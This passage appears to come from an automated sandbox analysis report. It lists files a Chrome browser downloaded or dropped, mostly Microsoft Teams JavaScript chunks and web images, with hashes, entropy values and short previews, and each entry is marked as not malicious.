                                                                                                                                                                                                                          SHA-256:9AA2ECD7B6595D53D99A0557C011E1BB5419774865263D364AAD79959CFC8362
                                                                                                                                                                                                                          SHA-512:6FE0950884F32BB2AEB96848D65495F2A71FED4B413A30307893EE0777F4AA2A0B67D6C29BD29DF175FBF5FE845F8241DC295A25FBDDBE56F84E8B3BCCA4867F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[22826],{277362:(e,t,n)=>{n.d(t,{p:()=>a});const a={AcceptSharedChannelInvitationDialog:"AcceptSharedChannelInvitationDialog",AccessibilitySettingsPanelButton:"AccessibilitySettingsPanelButton",AccountLocaleChangeNotificationJob:"AccountLocaleChangeNotificationJob",AccountSelectionDialog:"AccountSelectionDialog",ActivityFeed:"ActivityFeed",ActivityFeedBellClick:"ActivityFeedBellClick",ActivitySlices:"ActivitySlices",ActivitySlicesPopOutButton:"ActivitySlicesPopOutButton",AcceptInvitationFromAccountAndSettingPage:"AcceptInvitationFromAccountAndSettingPage",AdaptiveCardInvokeButton:"AdaptiveCardInvokeButton",AddAccountFromButton:"AddAccountFromButton",AddAccountFromMeMenu:"AddAccountFromMeMenu",AddAccountFromSettings:"AddAccountFromSettings",AddAccountFromSignoutDialog:"AddAccountFromSignoutDialog",AddCloudStorageFolderDialog:"AddCloudStorageFolderDialog",AddGoogleContactsSyncEr
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):5244
                                                                                                                                                                                                                          Entropy (8bit):7.899256833505812
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:eo8H58Q+eYuzTZjyeklq3EZW+Dh4iujXTGAgqr2htPX5mc:eos+eYeT+qL4cTGAahtPXl
                                                                                                                                                                                                                          MD5:7B5C1EF4E710870C8A0FD583059D522E
                                                                                                                                                                                                                          SHA1:E6108E4C9A326FD55A9B029D9D0E6B75FB0016D0
                                                                                                                                                                                                                          SHA-256:14FDF121E19172A677C8EFBF4373FA699BC2090AC89F1545950821F87B283A97
                                                                                                                                                                                                                          SHA-512:67F37EA057AA885ADD9695C0CAB1FF69191B3E291C7A0F85AD05929B39D6F90BD5274B6BBE4CD3EDD80A70E49D2042A886F0068B2902DBBF68090D2C3A1B837E
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:"https://img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/blob-92f0eb4.png/:/rs=w:192,h:192,m"
                                                                                                                                                                                                                          Preview:RIFFt...WEBPVP8X...........D..ALPH..........q....1.e.,.h.\Ue.B+..+..`(.`x............}.{..#...h...*...2...4.24=....O.y@r.......U+..w........j...D..../.9a'..Q=...W...W@..Q.[0........9..+'../....Y...0A...\V...T....Q0`U..(t...L.G.v3..........4.l../.....b...'.+gn./....."...yO.......r%c.....%OiU...{:......D.,..~.$7.:...M.?.J..<....b....<.....]c...n'. .. ..Q.t@P..".."!1.v...s.S(o.....&..q... 1PTci....CQa..0L..n.H.@\......V.q......}..x.l.5.a.&]..^2....EQ...'.`.C.ac.T...+[^Q.YZml. ..0%........7d7...r!..J.$....o........V.*...#.C...xv5<..'...;Q4...'...+...K........]..'..[.J._..~.e........7..V..no.d.=.M.......7.J........<....w..`2\xF|':.....%....6..ZH.E...w.........._K.}_..k.....~....>........a..._=......|.+.....V9...q;......w..9+.`b.|as?.:I..1...`.{Z...fz..[Z8.I.....j..[9....9s%..@S.f*;.eBX3............./.)...Lk..#........8u..+....y..ff..;jf.AM...........%...\.G....."h.=....>...d@....f....!k......3r.X..$.r3.6.b..L.aB.`,...E..".....~..e..
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (18896)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):19004
                                                                                                                                                                                                                          Entropy (8bit):5.306974413145656
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:G4AQE0IXIfeJgWCljWwXS+YuD/CEz5p+ZExpUZKVDziCzxA5R2qe9RoqrS:u0lWCrD/CEdHi9PT
                                                                                                                                                                                                                          MD5:C685FFC1C5CE457B25393165744C7D08
                                                                                                                                                                                                                          SHA1:6469598AEFA52571D810FF03E52F00676D8C4F6D
                                                                                                                                                                                                                          SHA-256:686C2F561FFC20EB44E792F2F5F477409B029F2F4AEB7EF832E211AFB1691F62
                                                                                                                                                                                                                          SHA-512:FE85EEB7E62B7ECE8192FFD481C93CBBB80CC2C3E135F8EEB8E40E07FC605DE831C028F9EDBCA0304B351169347426A63FC6015C4E637CE46ED32B302A0DC273
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/534940-f1c535e0c8723100.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[534940],{796767:(e,t,n)=>{n.d(t,{S:()=>i});var a=n(953543),r=n(504405),i=function(e){var t;return{attributes:{wrapper:{role:"presentation","data-tabs":"true"},root:(t={role:"tab",tabIndex:0,"aria-selected":!!e.active,"aria-label":e["aria-label"],"aria-labelledby":e["aria-labelledby"],"aria-describedby":e["aria-describedby"],"aria-controls":e["aria-controls"],"aria-disabled":e.disabled},t[r.P]=!0,t)},keyActions:{root:{performClick:{keyCombinations:[{keyCode:a.rC.Enter},{keyCode:a.ZG}]}}}}}},584667:(e,t,n)=>{n.d(t,{G:()=>i});var a=n(888846),r=n(796767),i=function(){return{attributes:{root:{role:"tablist"}},focusZone:{props:{shouldFocusInnerElementWhenReceivedFocus:!0,direction:a.E.bidirectionalDomOrder}},childBehaviors:{item:r.S}}}},510533:(e,t,n)=>{n.d(t,{FN:()=>G,ih:()=>H,LA:()=>D});var a=n(112882),r=n.n(a),i=n(109161),o=n.n(i),s=n(936666),l=n(953543),c=function(e){return{att
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (51711)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):51819
                                                                                                                                                                                                                          Entropy (8bit):5.396916250619922
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:ejcrcWCLys9Pod8X5cceHZGbckMnXd1c5xcVJkyOz42syyPMVb2+vvDWLIFKmK6:LeljdZWydVSlmh
                                                                                                                                                                                                                          MD5:E9BAFB2820BC7922B44E12BCD523B1D1
                                                                                                                                                                                                                          SHA1:BEA7DDF3E853CE508AAC415553BCE6E7635F6A23
                                                                                                                                                                                                                          SHA-256:A995D7E16B5D4549A94E28CAFC569E140431135922F410C1965B5EE80353F007
                                                                                                                                                                                                                          SHA-512:11303050E451CC318A7F6CAD193595A20330B093A71566E0DB92CBCF58CFF55CB52A70170FD4D8C0F9A2E41D162E3F06BE3A94F8DBB2C6119C2F7D101FDB33CE
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/616161-320ea2e58c4a17c9.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[616161],{333890:(e,r,t)=>{"use strict";t.d(r,{P:()=>o});var n=t(746548),a=t(513432),o=a.createContext((0,n.c)())},155259:(e,r,t)=>{"use strict";t.d(r,{Y:()=>n});var n=function(){function e(){this.performance=void 0,this.enabled=void 0,this.performance={},this.enabled=!0}return e.prototype.reset=function(){this.performance={}},e}()},746548:(e,r,t)=>{"use strict";t.d(r,{c:()=>lr});var n=t(640901),a=t.n(n),o=t(848949),i=t(828770),s=t.n(i),c=t(49102);function u(e,r,t){var n=arguments.length>3&&void 0!==arguments[3]?arguments[3]:{};return e.plugins.length>0?(0,c.A)(e.plugins,(function(r,a){return a(r,t,e,n)}),r):r}var l="RULE",f="KEYFRAME",d="FONT",p="STATIC",h="CLEAR",v=/^(:|\[|>|&)/;function g(e){return v.test(e)}function m(e){return"&"===e.charAt(0)?e.slice(1):e}function b(e){return"@media"===e.substr(0,6)}function y(e,r){return 0===e.length?r:e+" and "+r}function A(e){return"@supports"===e
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):956960
                                                                                                                                                                                                                          Entropy (8bit):5.324069629525273
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:hkZVWaypSi43ezbTNZ/0rf8sw127hKeYIvhX:hCVWaypShezbTL/0rf8LwhKe3hX
                                                                                                                                                                                                                          MD5:11FE86E1BFBC795099A8E2EC5FD2BA35
                                                                                                                                                                                                                          SHA1:ED3A0458F300B02387AEECCEBFCB7E58B5BE45A6
                                                                                                                                                                                                                          SHA-256:B74B9A4ED3D4945D1F5013DFB2B41742B587F81863B6D89476BDBE9F821F3FD8
                                                                                                                                                                                                                          SHA-512:3DF3757D44F9DC057CD32295D4ED085D008C82D6E7C844B9F5B139358912F572C22C49CD8EA137036251EE73A4ED9E2F856F95701F15B414476ECC7F8248639B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[268910],{669130:(e,r,o)=>{o.d(r,{b:()=>n});var i=o(152608);const t={bodyFontFamily:"-apple-system, BlinkMacSystemFont, 'Segoe UI', system-ui, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Web', sans-serif",codeFontFamily:"'Cascadia Mono', Consolas, ui-monospace, Menlo, Monaco, monospace",colors:o(634855).j,colorScheme:{brand:{background4:"#464775"}}},n={siteVariables:{...i.k.siteVariables,...t}}},388136:(e,r,o)=>{o.d(r,{$:()=>w});var i=o(152608),t=o(954057);const n={root:e=>{const{theme:{siteVariables:{colorScheme:r}},variables:{statusNote:o,...i}}=e,{default:n}=r,a=(0,t.jI)("Alert","root");return{...o&&{backgroundColor:n.background4},...i&&a(i,e)}}},a={root:e=>{const{theme:{siteVariables:{colorScheme:r}},variables:{isRosterHeaderMoreMenuButton:o,...i}}=e,{default:n}=r,a=(0,t.jI)("Button","root");return{...o&&{backgroundColor:n.background2},...i&&a(i,e)}}},d={root:e=>{cons
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (36879)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):36987
                                                                                                                                                                                                                          Entropy (8bit):5.379410624740036
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:yRWn0S3+zdj+ZSt/oz3lhNBbSCeMcxNDTHmwHQoUeYVu:ygnr+AU/ozTNBbSC9eN
                                                                                                                                                                                                                          MD5:EABD9EE763EBBE8CC6821242AD8968B7
                                                                                                                                                                                                                          SHA1:B70611C7EDBC1D933213EA7BF9A84A957F797CB4
                                                                                                                                                                                                                          SHA-256:D483B2A08866685564D04498B99A02C03D2A2690F4F2A03E78E062AA761FD44B
                                                                                                                                                                                                                          SHA-512:5004261B5BF175EBAD0D50C794957AFD8FAE1E92B86D4BAF8B48BEB0C540FBE62FA36A7348B0ECA2C40457FAEFBB4AC8F7ABC2C42CCDC7D1D4DE8EBD658B7740
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[602438],{562341:(e,t,n)=>{n.d(t,{V:()=>r});var o=n(953543),r=function(e){return{attributes:{root:{role:"button"===e.as?void 0:"button",tabIndex:"button"===e.as||e.disabled?void 0:0,disabled:"button"===e.as?e.disabled:void 0,"aria-disabled":e.disabledFocusable}},keyActions:{root:Object.assign({},"button"!==e.as&&"a"!==e.as&&{performClick:{keyCombinations:[{keyCode:o.rC.Enter},{keyCode:o.ZG}]}})}}}},928879:(e,t,n)=>{n.d(t,{Z:()=>c});var o=n(55543),r=n.n(o),i=n(666293),a=n.n(i),s=n(953543),c=function(e){var t,n,o=a()(e.on)?e.on:[e.on],i=e.tabbableTrigger?{tabIndex:u("tabIndex",e,0)}:void 0;i&&(i["aria-haspopup"]=null!=(t=e.trigger)&&t.props.hasOwnProperty("aria-haspopup")?null==(n=e.trigger)?void 0:n.props["aria-haspopup"]:"dialog");return{attributes:{trigger:Object.assign({},i),popup:{role:e.trapFocus?"dialog":e.inline?void 0:"complementary","aria-modal":!!e.trapFocus||void 0,"
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (51711)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):51819
                                                                                                                                                                                                                          Entropy (8bit):5.396916250619922
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:ejcrcWCLys9Pod8X5cceHZGbckMnXd1c5xcVJkyOz42syyPMVb2+vvDWLIFKmK6:LeljdZWydVSlmh
                                                                                                                                                                                                                          MD5:E9BAFB2820BC7922B44E12BCD523B1D1
                                                                                                                                                                                                                          SHA1:BEA7DDF3E853CE508AAC415553BCE6E7635F6A23
                                                                                                                                                                                                                          SHA-256:A995D7E16B5D4549A94E28CAFC569E140431135922F410C1965B5EE80353F007
                                                                                                                                                                                                                          SHA-512:11303050E451CC318A7F6CAD193595A20330B093A71566E0DB92CBCF58CFF55CB52A70170FD4D8C0F9A2E41D162E3F06BE3A94F8DBB2C6119C2F7D101FDB33CE
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[616161],{333890:(e,r,t)=>{"use strict";t.d(r,{P:()=>o});var n=t(746548),a=t(513432),o=a.createContext((0,n.c)())},155259:(e,r,t)=>{"use strict";t.d(r,{Y:()=>n});var n=function(){function e(){this.performance=void 0,this.enabled=void 0,this.performance={},this.enabled=!0}return e.prototype.reset=function(){this.performance={}},e}()},746548:(e,r,t)=>{"use strict";t.d(r,{c:()=>lr});var n=t(640901),a=t.n(n),o=t(848949),i=t(828770),s=t.n(i),c=t(49102);function u(e,r,t){var n=arguments.length>3&&void 0!==arguments[3]?arguments[3]:{};return e.plugins.length>0?(0,c.A)(e.plugins,(function(r,a){return a(r,t,e,n)}),r):r}var l="RULE",f="KEYFRAME",d="FONT",p="STATIC",h="CLEAR",v=/^(:|\[|>|&)/;function g(e){return v.test(e)}function m(e){return"&"===e.charAt(0)?e.slice(1):e}function b(e){return"@media"===e.substr(0,6)}function y(e,r){return 0===e.length?r:e+" and "+r}function A(e){return"@supports"===e
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (14156)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):14264
                                                                                                                                                                                                                          Entropy (8bit):5.4947284760221144
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:+u7P/rlu7U3YHcmZI6hvOZwXP/y7wltBRZNQmdeuKdRX+bH/Eq+iWs8iV9+3:+KP/rlKU3YH7I6xOZSy8lrByuKdgbH/k
                                                                                                                                                                                                                          MD5:256ED7E30F9976F4FEEB07EFC1F550B9
                                                                                                                                                                                                                          SHA1:4C46E9AEB09277E67CD9E58BE8420CA8E731136D
                                                                                                                                                                                                                          SHA-256:2B963A7C1BFB48794672A34F7FE9FFFD06A05BE6C11C32D1BB7012F15116442C
                                                                                                                                                                                                                          SHA-512:AC6BC58C03C1E8CBED4B283D07B11CBC3B774BDF915F7DF8D9EBD7BCC70EB0FD71DE80009F24CC442255F5EB55BCDD2CA1FACFDE3006B708E194DE7514696273
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[224109],{263821:(e,t,o)=>{o.d(t,{R:()=>m});var n=o(513432),l=o(164093),a=o(250452);var r=o(644525),s=o(854130);var i=o(103735),c=o(526521);const f="fui-DialogBody",u=(0,i.D)("r1h3qql9",null);var d=o(35871);const m=n.forwardRef(((e,t)=>{const o=((e,t)=>{var o;return{components:{root:"div"},root:l.Gk((0,a.g)(null!==(o=e.as)&&void 0!==o?o:"div",{ref:t,...e}),{elementType:"div"})}})(e,t);return(e=>{const t=u();e.root.className=(0,c.z)(f,t,e.root.className)})(o),(0,d.useCustomStyleHook_unstable)("useDialogBodyStyles_unstable")(o),(e=>((0,s.C)(e),(0,r.Y)(e.root,{})))(o)}));m.displayName="DialogBody"},951195:(e,t,o)=>{o.d(t,{C:()=>m});var n=o(513432),l=o(164093),a=o(250452);var r=o(644525),s=o(854130);var i=o(103735),c=o(526521);const f="fui-DialogContent",u=(0,i.D)("r1v5zwsm",null);var d=o(35871);const m=n.forwardRef(((e,t)=>{const o=((e,t)=>{var o;return{components:{root:"div"},ro
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (16052)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):16159
                                                                                                                                                                                                                          Entropy (8bit):5.403213464045788
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:qF/Vze9fyDd5XbL02+tzovnkPky/tdhXisJF0zFlCvmdDQnmumjftj76tA4EN9:kdzjd5rL02gzovnGtldIsJF0pQvmd8mT
                                                                                                                                                                                                                          MD5:4081724B2479E5E968A58A0682ECE8EB
                                                                                                                                                                                                                          SHA1:449F3DC38DA9CB1826064CC92CCA171D05D4527B
                                                                                                                                                                                                                          SHA-256:4EF6E1959E07EF11CA16E74EDD46384665C5AFFA72A8D8F2BDFDC1F19FB0566F
                                                                                                                                                                                                                          SHA-512:7942E3A9D9D45F6C6268040756632D9EA6D6C172245CF8170591E37B465C8F85927795BB5223806B319B575F78F4C294DEBBCC533B5EE37B6ABF75BADA163239
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[61875],{437932:(e,t,n)=>{n.d(t,{T:()=>$});var o=n(598166),r=n(35871),i=n(70410),a=n(602835),l=n(716300),s=n(513432);function c(e,t,n){const o=s.useRef(!0),[r]=s.useState((()=>({value:e,callback:t,facade:{get current(){return r.value},set current(e){const t=r.value;if(t!==e){if(r.value=e,n&&o.current)return;r.callback(e,t)}}}})));return(0,l.E)((()=>{o.current=!1}),[]),r.callback=t,r.facade}const u=e=>{switch(e){case"always":case!0:return{applyMaxWidth:!0,applyMaxHeight:!0};case"width-always":case"width":return{applyMaxWidth:!0,applyMaxHeight:!1};case"height-always":case"height":return{applyMaxWidth:!1,applyMaxHeight:!0};default:return!1}},d=e=>{const t=e&&(e=>"HTML"===e.nodeName?e:e.parentNode||e.host)(e);if(!t)return document.body;switch(t.nodeName){case"HTML":case"BODY":return t.ownerDocument.body;case"#document":return t.body}const{overflow:n,overflowX:o,overflowY:r}=(e=>{v
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):61
                                                                                                                                                                                                                          Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                                                                                                                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (26062)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):26168
                                                                                                                                                                                                                          Entropy (8bit):5.296571517037529
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:XK0TO27wdekqJ/zJnhWh45hvim95mFADabEUjt7BA:Oe1J/VhWh45hf7Dazjty
                                                                                                                                                                                                                          MD5:A46EFC647DE93EE6A18BD892F4A95BB2
                                                                                                                                                                                                                          SHA1:4FFD23C55B16482BE0AE5A545C0977EC7AC78143
                                                                                                                                                                                                                          SHA-256:2968994431F249465FF67033C9A9A43132B38FE0B982ED7CCF4AF39909604BD6
                                                                                                                                                                                                                          SHA-512:CCA8C183453DDC9D52E1A104248AAA563A988CAEAAEEA4587454E14D45770ED8CA7F878D6177B4E66F18E0ED284127EC73C3C0842E2843ABD9CC547C6BF9C781
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[7747],{799323:(e,n,t)=>{t.d(n,{x:()=>a});var r=t(513432),o=function(e){return void 0===e},a=function(e){var n=r.useState(o(e.defaultValue)?e.initialValue:e.defaultValue),t=n[0],a=n[1],i=o(e.value)?t:e.value,l=r.useRef(i);r.useEffect((function(){l.current=i}),[i]);var s=r.useCallback((function(e){l.current="function"==typeof e?e(l.current):e,a(l.current)}),[]);return[i,s]}},783943:(e,n,t)=>{t.d(n,{D:()=>a});var r=t(513432),o=t(338400),a=function(e){var n=r.useRef((function(){throw new Error("Cannot call an event handler while rendering")}));return(0,o.E)((function(){n.current=e}),[e]),r.useCallback((function(){return n.current.apply(void 0,arguments)}),[n])}},182812:(e,n,t)=>{t.d(n,{a:()=>o});var r=t(513432);function o(){for(var e=arguments.length,n=new Array(e),t=0;t<e;t++)n[t]=arguments[t];var o=r.useCallback((function(e){o.current=e;for(var t=0,r=n;t<r.length;t++){var a=r[t
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (28072)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):28179
                                                                                                                                                                                                                          Entropy (8bit):5.227607445648655
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:/8XyeuhomhaOs2UksOiRTtBEUkZrJvM7KqvZwr:quXa1+JvM7KAZm
                                                                                                                                                                                                                          MD5:D59AC3434536A3CFFE78A623BA737216
                                                                                                                                                                                                                          SHA1:56101E26061017929AF754CEA4AE361543E3BB15
                                                                                                                                                                                                                          SHA-256:4493BF71F4693A47C722B457C5BDBEFC5F26F315C03E448FC3E5B32AE14BC123
                                                                                                                                                                                                                          SHA-512:665EDB71A622BA51A8C8C39EE11D662B1A92BC56897CE7C8BC5D768E616E6EE9427748D08939B39704A3F5319F2065B3120110BF930BFE2CBB4F1B975B99C981
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[96611],{306766:(e,n,t)=>{t.d(n,{u$:()=>i,EY:()=>a,wu:()=>o,fS:()=>l,Xd:()=>r,Zb:()=>s,vT:()=>d});var i,a,o,l,r,s,d;!function(e){e.SingleWindowExperience="single-window-experience",e.MultiWindowExperience="multi-window-experience"}(i||(i={})),function(e){e.NavigatePromiseBiMError="navigate-promise-bim-error",e.DuplicateScenarioCreation="duplicate-scenario-creation",e.IntentIdUndefined="intent-id-undefined"}(a||(a={})),function(e){e.ScenarioNotFound="scenario-not-found",e.IntentNotFoundForCallingWindowingIntentId="intent-not-found-for-calling-windowing-intent-id",e.ContainerNotFoundForCallingWindowingIntentId="container-not-found-for-calling-windowing-intent-id",e.InvalidUpdateType="invalid-update-type",e.ContainerRenderFailed="container-render-failed"}(o||(o={})),function(e){e.CloseContainerFailed="close-container-failed",e.CloseContainerTimeout="close-container-timeout",e.Int
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (966)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):1022
                                                                                                                                                                                                                          Entropy (8bit):5.168862244232466
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:RMRGBLEdPSvkD9Veh/Js8FZdVpbWkm5nSHrImMRr:RQw41SvkD9CFKkanOrImQr
                                                                                                                                                                                                                          MD5:352FFAB43E1CEC3BB949809E347B423B
                                                                                                                                                                                                                          SHA1:F08547F3BC7D5D8C8FA6F058DFFE5D68AA42E943
                                                                                                                                                                                                                          SHA-256:E2AA142D9E27BD75B23BB0827CEDB6E05CCDD2AD42C9ACC1D4597B2DD4093EB5
                                                                                                                                                                                                                          SHA-512:3E1464D4F7E36C88541B6BBFACA373EEF66E5057346C113D1A0858452191296B380DCFBF211514203DFC5F75FCD302D7B35122E2FA21BBEC490A77D556A99069
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@wsb/guac-widget-shared/c/dynamicFontScaler-ecd443bf.js
                                                                                                                                                                                                                          Preview:define("@wsb/guac-widget-shared/c/dynamicFontScaler-ecd443bf.js",["exports"],(function(e){"use strict";const t={wordWrap:"normal !important",overflowWrap:"normal !important",display:"none",visibility:"hidden",position:"absolute",width:"auto",overflow:"visible",left:0};e.d=function(e){let{text:a,containerId:n,font:o,fontSizes:i,style:r,Tag:l=(global.Core||guac["@wsb/guac-widget-core"]).UX2.Element.Element,typography:c,targetId:d,maxLines:s=3,prioritizeDefault:g}=e;const p={containerId:n,targetId:d,fontSizes:i,maxLines:s,prioritizeDefault:g};return{element:(global.React||guac.react).createElement((global.React||guac.react).Fragment,null,i.map((e=>(global.React||guac.react).createElement(l,{tag:"span",key:e,font:o,style:{...r,...t,fontSize:e},"data-size":e,"data-scaler-id":`scaler-${n}`,typography:c,"data-ux":"scaler","aria-hidden":!0},a)))),scriptProps:p,callback:()=>window.wsb.DynamicFontScaler(p)}}})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=dynamicFontS
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:PNG image data, 210 x 69, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):13360
                                                                                                                                                                                                                          Entropy (8bit):7.9580777891645225
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:a8RUbCaLjPC6X+Z/1AuLfXIXuyyh+HmVZkaPK72C4gvatexsgomJVUQEOrf:RK/Xm/1AIPiDI9Zkab8StexHoQPEwf
                                                                                                                                                                                                                          MD5:244DDFF5767ED5DF511D024782FF2CB1
                                                                                                                                                                                                                          SHA1:4A24044CDD0ABA1D53CB529DD292733E3BA9D070
                                                                                                                                                                                                                          SHA-256:E75DA4E6B539B3AF6F5D09CA46C233A01F4DF1549B6AC27F2645FAF3C102626D
                                                                                                                                                                                                                          SHA-512:A91BFF7534F57F33837D7BB2FCF67A04190C3EDD3D0EC2BECC66FFC402907C7FF554E9B34E1E0AFDADE7B4C3C0F864527B19EBCEE2639F82C1E95E3ED7F40A29
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
